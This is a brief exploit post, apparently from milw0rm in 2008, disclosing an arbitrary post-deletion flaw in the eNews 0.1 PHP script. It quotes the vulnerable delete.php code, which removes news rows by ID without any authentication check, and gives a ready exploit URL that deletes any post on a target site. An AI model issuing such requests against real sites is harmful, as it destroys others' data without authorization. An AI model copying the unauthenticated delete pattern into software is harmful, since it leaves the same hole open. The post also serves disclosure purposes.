29 lines
No EOL
721 B
Text
29 lines
No EOL
721 B
Text
eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability
|
|
|
|
|
|
Author: iLker Kandemir [MEFISTO]
|
|
|
|
Script download : http://www.hotscripts.com/Detailed/81086.html
|
|
|
|
script demo : http://emvvy.com/demos/enews/
|
|
|
|
site : www.dumenci.net
|
|
|
|
----------------------------------------------------------------
|
|
//poc:
|
|
|
|
if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
|
|
$deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
|
|
GetSQLValueString($_GET['delete'], "int"));
|
|
|
|
----------------------------------------------------------------
|
|
|
|
//exploit :
|
|
|
|
http://[site]/delete.php?delete=[eNews_id]
|
|
|
|
----------------------------------------------------------------
|
|
|
|
tnx : aLL my FriEndZ
|
|
|
|
# milw0rm.com [2008-06-21] |